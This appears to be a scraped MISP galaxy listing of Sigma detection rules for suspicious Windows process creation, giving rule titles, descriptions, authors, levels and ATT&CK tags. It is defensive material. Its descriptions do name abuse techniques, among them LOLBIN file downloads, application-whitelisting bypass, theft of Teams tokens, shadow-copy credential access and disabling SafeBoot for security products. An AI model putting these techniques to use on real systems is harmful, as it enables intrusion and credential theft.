Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/01
falsepositive ['Unknown']
filename proc_creation_win_gpresult_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1615']
Related clusters

To see the related clusters, click here.

Use of FSharp Interpreters

The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.

Internal MISP references

UUID b96b2031-7c17-4473-afe7-a30ce714db29 which can be used as unique global reference for Use of FSharp Interpreters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
creation_date 2022/06/02
falsepositive ['Legitimate use by a software developer.']
filename proc_creation_win_lolbin_fsharp_interpreters.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Hardware Model Reconnaissance Via Wmic.EXE

Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information

Internal MISP references

UUID 3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d which can be used as unique global reference for Hardware Model Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/02/14
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_csproduct.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'car.2016-03-002']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Command Targeting Teams Sensitive Files

Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. The database might contain authentication tokens and other sensitive information about the logged in accounts.

Internal MISP references

UUID d2eb17db-1d39-41dc-b57f-301f6512fa75 which can be used as unique global reference for Potentially Suspicious Command Targeting Teams Sensitive Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SerkinValery
creation_date 2022/09/16
falsepositive ['Unknown']
filename proc_creation_win_teams_suspicious_command_line_cred_access.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1528']
Related clusters

To see the related clusters, click here.

Remote Access Tool - AnyDesk Piped Password Via CLI

Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.

Internal MISP references

UUID b1377339-fda6-477a-b455-ac0923f9ec2c which can be used as unique global reference for Remote Access Tool - AnyDesk Piped Password Via CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/28
falsepositive ['Legitimate piping of the password to anydesk', "Some FP could occur with similar tools that uses the same command line '--set-password'"]
filename proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Shadow Copies storage symbolic link creation using operating systems utilities

Internal MISP references

UUID 40b19fa6-d835-400c-b301-41f3a2baacaf which can be used as unique global reference for VolumeShadowCopy Symlink Creation Via Mklink in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, oscd.community
creation_date 2019/10/22
falsepositive ['Legitimate administrator working with shadow copies, access for backup purposes']
filename proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Suspicious LOLBIN AccCheckConsole

Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL

Internal MISP references

UUID 0f6da907-5854-4be6-859a-e9958747b0aa which can be used as unique global reference for Suspicious LOLBIN AccCheckConsole in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/06
falsepositive ['Legitimate use of the UI Accessibility Checker']
filename proc_creation_win_lolbin_susp_acccheckconsole.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Import LDAP Data Interchange Format File Via Ldifde.EXE

Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.

Internal MISP references

UUID 6f535e01-ca1f-40be-ab8d-45b19c0c8b7f which can be used as unique global reference for Import LDAP Data Interchange Format File Via Ldifde.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @gott_cyber
creation_date 2022/09/02
falsepositive ['Since the content of the files are unknown, false positives are expected']
filename proc_creation_win_ldifde_file_load.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.defense_evasion', 'attack.t1218', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Suspicious Microsoft Office Child Process

Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)

Internal MISP references

UUID 438025f9-5856-4663-83f7-52f878a70a50 which can be used as unique global reference for Suspicious Microsoft Office Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io
creation_date 2018/04/06
falsepositive ['Unknown']
filename proc_creation_win_office_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1047', 'attack.t1204.002', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Suspicious Call by Ordinal

Detects suspicious calls of DLLs in rundll32.dll exports by ordinal

Internal MISP references

UUID e79a9e79-eb72-4e78-a628-0e7e8f59e89c which can be used as unique global reference for Suspicious Call by Ordinal in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/22
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment', 'Windows control panel elements have been identified as source (mmc)']
filename proc_creation_win_rundll32_by_ordinal.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Suspicious Use of CSharp Interactive Console

Detects the execution of CSharp interactive console by PowerShell

Internal MISP references

UUID a9e416a8-e613-4f8b-88b8-a7d1d1af2f61 which can be used as unique global reference for Suspicious Use of CSharp Interactive Console in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael R. (@nahamike01)
creation_date 2020/03/08
falsepositive ['Possible depending on environment. Pair with other factors such as net connections, command-line args, etc.']
filename proc_creation_win_csi_use_of_csharp_console.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1127']
Related clusters

To see the related clusters, click here.

PUA - Wsudo Suspicious Execution

Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)

Internal MISP references

UUID bdeeabc9-ff2a-4a51-be59-bb253aac7891 which can be used as unique global reference for PUA - Wsudo Suspicious Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/02
falsepositive ['Unknown']
filename proc_creation_win_pua_wsudo_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Use of TTDInject.exe

Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)

Internal MISP references

UUID b27077d6-23e6-45d2-81a0-e2b356eea5fd which can be used as unique global reference for Use of TTDInject.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/16
falsepositive ['Legitimate use']
filename proc_creation_win_lolbin_ttdinject.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell IEX Execution Patterns

Detects suspicious ways to run Invoke-Execution using IEX alias

Internal MISP references

UUID 09576804-7a05-458e-a817-eb718ca91f54 which can be used as unique global reference for Suspicious PowerShell IEX Execution Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/03/24
falsepositive ['Legitimate scripts that use IEX']
filename proc_creation_win_powershell_iex_patterns.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Deny Service Access Using Security Descriptor Tampering Via Sc.EXE

Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.

Internal MISP references

UUID 99cf1e02-00fb-4c0d-8375-563f978dfd37 which can be used as unique global reference for Deny Service Access Using Security Descriptor Tampering Via Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonhnathan Ribeiro, oscd.community
creation_date 2020/10/16
falsepositive ['Unknown']
filename proc_creation_win_sc_sdset_deny_service_access.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Ping Hex IP

Detects a ping command that uses a hex encoded IP address

Internal MISP references

UUID 1a0d4aba-7668-4365-9ce4-6d79ab088dfd which can be used as unique global reference for Ping Hex IP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/03/23
falsepositive ['Unlikely, because no sane admin pings IP addresses in a hexadecimal form']
filename proc_creation_win_ping_hex_ip.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1140', 'attack.t1027']
Related clusters

To see the related clusters, click here.

LOLBIN Execution Of The FTP.EXE Binary

Detects execution of ftp.exe script execution with the "-s" or "/s" flag and any child processes ran by ftp.exe

Internal MISP references

UUID 06b401f4-107c-4ff9-947f-9ec1e7649f1e which can be used as unique global reference for LOLBIN Execution Of The FTP.EXE Binary in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename proc_creation_win_lolbin_ftp.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Response File Execution Via Odbcconf.EXE

Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.

Internal MISP references

UUID 5f03babb-12db-4eec-8c82-7b4cb5580868 which can be used as unique global reference for Response File Execution Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/22
falsepositive ['The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary.']
filename proc_creation_win_odbcconf_response_file.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.008']
Related clusters

To see the related clusters, click here.

Potential SMB Relay Attack Tool Execution

Detects different hacktools used for relay attacks on Windows for privilege escalation

Internal MISP references

UUID 5589ab4f-a767-433c-961d-c91f3f704db1 which can be used as unique global reference for Potential SMB Relay Attack Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/07/24
falsepositive ['Legitimate files with these rare hacktool names']
filename proc_creation_win_hktl_relay_attacks_tools.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1557.001']
Related clusters

To see the related clusters, click here.

Suspicious Active Directory Database Snapshot Via ADExplorer

Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory.

Internal MISP references

UUID ef61af62-bc74-4f58-b49b-626448227652 which can be used as unique global reference for Suspicious Active Directory Database Snapshot Via ADExplorer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/14
falsepositive ['Unknown']
filename proc_creation_win_sysinternals_adexplorer_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.001', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

SafeBoot Registry Key Deleted Via Reg.EXE

Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products

Internal MISP references

UUID fc0e89b5-adb0-43c1-b749-c12a10ec37de which can be used as unique global reference for SafeBoot Registry Key Deleted Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Tim Shelton
creation_date 2022/08/08
falsepositive ['Unlikely']
filename proc_creation_win_reg_delete_safeboot.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Renamed AutoIt Execution

Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.

Internal MISP references

UUID f4264e47-f522-4c38-a420-04525d5b880f which can be used as unique global reference for Renamed AutoIt Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/06/04
falsepositive ['Unknown']
filename proc_creation_win_renamed_autoit.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Service Security Descriptor Tampering Via Sc.EXE

Detection of sc.exe utility adding a new service with special permission which hides that service.

Internal MISP references

UUID 98c5aeef-32d5-492f-b174-64a691896d25 which can be used as unique global reference for Service Security Descriptor Tampering Via Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/28
falsepositive ['Unknown']
filename proc_creation_win_sc_sdset_modification.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.011']
Related clusters

To see the related clusters, click here.

PktMon.EXE Execution

Detects execution of PktMon, a tool that captures network packets.

Internal MISP references

UUID f956c7c1-0f60-4bc5-b7d7-b39ab3c08908 which can be used as unique global reference for PktMon.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/17
falsepositive ['Legitimate use']
filename proc_creation_win_pktmon_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1040']
Related clusters

To see the related clusters, click here.

Msxsl.EXE Execution

Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.

Internal MISP references

UUID 9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0 which can be used as unique global reference for Msxsl.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019/10/21
falsepositive ['Msxsl is not installed by default and is deprecated, so unlikely on most systems.']
filename proc_creation_win_msxsl_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1220']
Related clusters

To see the related clusters, click here.

PrintBrm ZIP Creation of Extraction

Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.

Internal MISP references

UUID cafeeba3-01da-4ab4-b6c4-a31b1d9730c7 which can be used as unique global reference for PrintBrm ZIP Creation of Extraction in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/02
falsepositive ['Unknown']
filename proc_creation_win_lolbin_printbrm.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105', 'attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Renamed ZOHO Dctask64 Execution

Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation

Internal MISP references

UUID 340a090b-c4e9-412e-bb36-b4b16fe96f9b which can be used as unique global reference for Renamed ZOHO Dctask64 Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/01/28
falsepositive ['Unknown yet']
filename proc_creation_win_renamed_dctask64.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1055.001', 'attack.t1202', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Remote Access Tool - NetSupport Execution From Unusual Location

Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\Program Files')

Internal MISP references

UUID 37e8d358-6408-4853-82f4-98333fca7014 which can be used as unique global reference for Remote Access Tool - NetSupport Execution From Unusual Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/19
falsepositive ['Unknown']
filename proc_creation_win_remote_access_tools_netsupport_susp_exec.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

File Download Via InstallUtil.EXE

Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"

Internal MISP references

UUID 75edd216-1939-4c73-8d61-7f3a0d85b5cc which can be used as unique global reference for File Download Via InstallUtil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Unknown']
filename proc_creation_win_installutil_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

MSHTA Suspicious Execution 01

Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism

Internal MISP references

UUID cc7abbd0-762b-41e3-8a26-57ad50d2eea3 which can be used as unique global reference for MSHTA Suspicious Execution 01 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)
creation_date 2019/02/22
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_mshta_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1140', 'attack.t1218.005', 'attack.execution', 'attack.t1059.007', 'cve.2020.1599']
Related clusters

To see the related clusters, click here.

Csc.EXE Execution Form Potentially Suspicious Parent

Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.

Internal MISP references

UUID b730a276-6b63-41b8-bcf8-55930c8fc6ee which can be used as unique global reference for Csc.EXE Execution Form Potentially Suspicious Parent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2019/02/11
falsepositive ['Unknown']
filename proc_creation_win_csc_susp_parent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.t1059.007', 'attack.defense_evasion', 'attack.t1218.005', 'attack.t1027.004']
Related clusters

To see the related clusters, click here.

New Root Certificate Installed Via Certutil.EXE

Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

Internal MISP references

UUID d2125259-ddea-4c1c-9c22-977eb5b29cf0 which can be used as unique global reference for New Root Certificate Installed Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, @redcanary, Zach Stanford @svch0st
creation_date 2023/03/05
falsepositive ["Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP"]
filename proc_creation_win_certutil_certificate_installation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.004']
Related clusters

To see the related clusters, click here.

Suspicious X509Enrollment - Process Creation

Detect use of X509Enrollment

Internal MISP references

UUID 114de787-4eb2-48cc-abdb-c0b449f93ea4 which can be used as unique global reference for Suspicious X509Enrollment - Process Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/23
falsepositive ['Legitimate administrative script']
filename proc_creation_win_powershell_x509enrollment.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.004']
Related clusters

To see the related clusters, click here.

Wlrmdr.EXE Uncommon Argument Or Child Process

Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries. This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry.

Internal MISP references

UUID 9cfc00b6-bfb7-49ce-9781-ef78503154bb which can be used as unique global reference for Wlrmdr.EXE Uncommon Argument Or Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, manasmbellani
creation_date 2022/02/16
falsepositive ['Unknown']
filename proc_creation_win_wlrmdr_uncommon_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Renamed Msdt.EXE Execution

Detects the execution of a renamed "Msdt.exe" binary

Internal MISP references

UUID bd1c6866-65fc-44b2-be51-5588fcff82b9 which can be used as unique global reference for Renamed Msdt.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/06/03
falsepositive ['Unlikely']
filename proc_creation_win_renamed_msdt.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

HackTool - WinRM Access Via Evil-WinRM

Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Internal MISP references

UUID a197e378-d31b-41c0-9635-cfdf1c1bb423 which can be used as unique global reference for HackTool - WinRM Access Via Evil-WinRM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/07
falsepositive ['Unknown']
filename proc_creation_win_hktl_evil_winrm.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.006']
Related clusters

To see the related clusters, click here.

UEFI Persistence Via Wpbbin - ProcessCreation

Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section

Internal MISP references

UUID 4abc0ec4-db5a-412f-9632-26659cddf145 which can be used as unique global reference for UEFI Persistence Via Wpbbin - ProcessCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/18
falsepositive ['Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)']
filename proc_creation_win_wpbbin_potential_persistence.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1542.001']
Related clusters

To see the related clusters, click here.

Process Reconnaissance Via Wmic.EXE

Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.

Internal MISP references

UUID 221b251a-357a-49a9-920a-271802777cc0 which can be used as unique global reference for Process Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/01
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

UtilityFunctions.ps1 Proxy Dll

Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.

Internal MISP references

UUID 0403d67d-6227-4ea8-8145-4e72db7da120 which can be used as unique global reference for UtilityFunctions.ps1 Proxy Dll in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/28
falsepositive ['Unknown']
filename proc_creation_win_lolbin_utilityfunctions.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Suspicious Powercfg Execution To Change Lock Screen Timeout

Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout

Internal MISP references

UUID f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b which can be used as unique global reference for Suspicious Powercfg Execution To Change Lock Screen Timeout in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/11/18
falsepositive ['Unknown']
filename proc_creation_win_powercfg_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potentially Suspicious Event Viewer Child Process

Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt

Internal MISP references

UUID be344333-921d-4c4d-8bb8-e584cf584780 which can be used as unique global reference for Potentially Suspicious Event Viewer Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/19
falsepositive ['Unknown']
filename proc_creation_win_eventvwr_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002', 'car.2019-04-001']
Related clusters

To see the related clusters, click here.

New User Created Via Net.EXE

Identifies the creation of local users via the net.exe command.

Internal MISP references

UUID cd219ff3-fa99-45d4-8380-a7d15116c6dc which can be used as unique global reference for New User Created Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Endgame, JHasenbusch (adapted to Sigma for oscd.community)
creation_date 2018/10/30
falsepositive ['Legitimate user creation.', 'Better use event IDs for user creation rather than command line rules.']
filename proc_creation_win_net_user_add.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1136.001']
Related clusters

To see the related clusters, click here.

Potentially Suspicious ASP.NET Compilation Via AspNetCompiler

Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.

Internal MISP references

UUID 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 which can be used as unique global reference for Potentially Suspicious ASP.NET Compilation Via AspNetCompiler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/14
falsepositive ['Unknown']
filename proc_creation_win_aspnet_compiler_susp_paths.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Run Once Task Execution as Configured in Registry

This rule detects the execution of Run Once task as configured in the registry

Internal MISP references

UUID 198effb6-6c98-4d0c-9ea3-451fa143c45c which can be used as unique global reference for Run Once Task Execution as Configured in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)
creation_date 2020/10/18
falsepositive ['Unknown']
filename proc_creation_win_runonce_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Suspicious Execution of Powershell with Base64

Commandline to launch powershell with a base64 payload

Internal MISP references

UUID fb843269-508c-4b76-8b8d-88679db22ce7 which can be used as unique global reference for Suspicious Execution of Powershell with Base64 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/02
falsepositive ['Unknown']
filename proc_creation_win_powershell_encode.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Certificate Exported Via Certutil.EXE

Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates.

Internal MISP references

UUID 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5 which can be used as unique global reference for Certificate Exported Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/15
falsepositive ["There legitimate reasons to export certificates. Investigate the activity to determine if it's benign"]
filename proc_creation_win_certutil_export_pfx.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Potential PsExec Remote Execution

Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility

Internal MISP references

UUID ea011323-7045-460b-b2d7-0f7442ea6b38 which can be used as unique global reference for Potential PsExec Remote Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/28
falsepositive ['Unknown']
filename proc_creation_win_sysinternals_psexec_remote_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.resource_development', 'attack.t1587.001']
Related clusters

To see the related clusters, click here.

Whoami.EXE Execution With Output Option

Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.

Internal MISP references

